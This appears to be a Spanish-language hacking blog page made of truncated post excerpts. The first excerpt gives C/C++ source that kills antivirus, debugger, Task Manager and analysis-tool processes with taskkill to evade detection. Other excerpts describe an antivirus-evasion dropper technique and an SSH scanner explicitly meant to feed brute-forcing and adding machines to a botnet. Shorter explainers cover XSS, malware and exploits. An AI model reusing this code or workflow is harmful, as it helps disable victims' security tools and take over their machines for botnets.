Aprendis de hacker

Aqui un programita en c++ para matar los procesos de los anti virus y evadir la deteccion en algunos casos si se encuentra el proceso. codigo fuente: lo copiamos y lo pegamos en el editor de texto y lo guardamos como kill.c y luego lo compilamos con dev-c++ en windows o gcc #include <stdio.h> #include <windows.h> void killAll(){     //kill al av process!     system("@echo off"); system("echo killing.."); system("taskkill /f /im vbox.exe"); system("taskkill /f /im VBoxTray.exe"); system("taskkill /f /im avast.exe"); system("taskkill /f /im taskmgr.exe"); system("taskkill /f /im netstat.exe"); system("taskkill /f /im OLLYDBG.EXE"); system("taskkill /f /im x64DBG.exe"); system("taskkill /f /im nmap.exe"); system("taskkill /f /im burp.exe"); system("taskkill /f /im regedit.exe"); system("taskkill /f /im avast_install.exe"); system("taskkill /f /...

Que es? vulnerabilidad XSS (Cross‑site Scripting) en sitios web un ataque xss es una vulneravilidad en un paguina o aplicacion web que permite inyectar codigo por lo general del tip java script, en aplicaciones mal configuradas como por ejemplo un input o el metodo get de php en lugar de usar variables locales las inyectamos desde la url y esto permite a un atacante modificar el contenido de un sitio web con el fin de realizar ataques de pishing o redirigir a una victma a un sitio web malicioso con el fin de robar datos o descargar malware. TIPOS DE ATAQUES XSS Básicamente existen dos modalidades de vulnerabilidad XSS, muy parecidas entre sí, y que se conocen como “reflejada” y “persistente”. Cross Site Scripting persistente Si el código que hemos insertado se queda almacenado en el servidor, por ejemplo formando parte de una contribución en un foro, el ataque se dice que es persistente. Cualquier usuario que entre a leer dicha contribución leerá el texto inocente pero probableme...

Hoy les quiero mostrar una tecnica para evadir antivirus muy sencilla pero funcional Funciona de la siguiente manera: el ejecutable contine en su interior 3 funciones 1 un stub que descifra una muestra de malware que es detectado por todos los antivirus 2 otra funcion que dropea el malware detectable 3 y la tercera funcion que se encarga despues de un sierto tiempo de espera de ver si el archivo malicioso aun esta en el caso de estarlo mostrara un mensaje no se a detectado ningun antivirus de lo contrario si el malware ya no esta asumira que hay un antivirus instalado y terminara su ejecucion. Pero tambien en si no se detecta ningun antivirus podriamos dropear nuestro verdadero malware y iniciar su ejecucion, el codigo esta escrito en python pero la tecnica se podria implementar en cualquier otro lenguaje de programacion incluso uno compilado como golang o c++ el link del proyectos es este Evator .

Hoy les quiero presentar un  proyecto que hice es un generador de rangos ip y escaner de puertos ssh, y se preguntaran de que nos sirve ?. Bueno le explico como funciona primero ejecutamos el con python desde la consola nos pedira un rango ip como por ejemplo 192.168.0.  el numero final no lo ingresamos solo hasta el ultimo punto de la ip que queramos tanto dentro como fuera de lan. luego automaticamente empesara a generar un listado de ips y escanearea automaticamente si esta abierto el puerto ssh en el caso de  estarlo lo agregara a un archivo SSH-LIST.txt con todas las ips con el puerto ssh abierto que luego podemos usar para hacer fuerza bruta a cada ip, entonces una vez que obtenemos el user:password lo agregamos a nuestra botnet. Cabe destacar que este script no hace fuerza bruta ni agrega los equipos a un botnet solo escanea un rango de ips en busca de puertos ssh abiertos para obtener un listado y luego con otra herramienta hacer fuerza bruta y cargarlos a una bot...

La  programacion de malware es uno de los mundos mas diversos en la seguridad imformatica o hackers programadores,  existen muchos tipos de malware  algunos que no hacen nada malo y otros que se roban tus  datos, te hacen formar  parte de  una  botnet o te dejan el ordenador completamente inservible,  en  la actaulidad  cualquiera  que pueda usar un ordenador  puede crear malware ya se con sus propios conocimientos o siguiendo tutoriales en youtube o blogs  de hacking, existen una variedad  de  malware que incluso  puede que haya superado e el software normal. Que es malware? un malware de del ingles malicious-software es todo programa malicioso con la intencion de corromper el normal funcionamiento del sistema operativo o hacer un actividad malintencionada en pocas palabras es un programa malicioso. Quien programa malware? Los programadores  de malware por lo general son hackers o programadores i...

El  mundo del  hacking esta plagado de tecnicas  de  hacking y el desarollo de exploits  es una manera  muy potente y eficas de infiltrarse en un sistema pero. Que es un  exploit? un exploit es un un  script  o  codigo malicioso que se aprovecha de una vulneravilidad de 0-day en un sistema, los que los  hace peligrosos es que se  aprovechan de  fallos que solo quien desarollo el exploit  conose  y por lo general  son completamente indetectables a los antivirus ya que no tiene una firma conosida.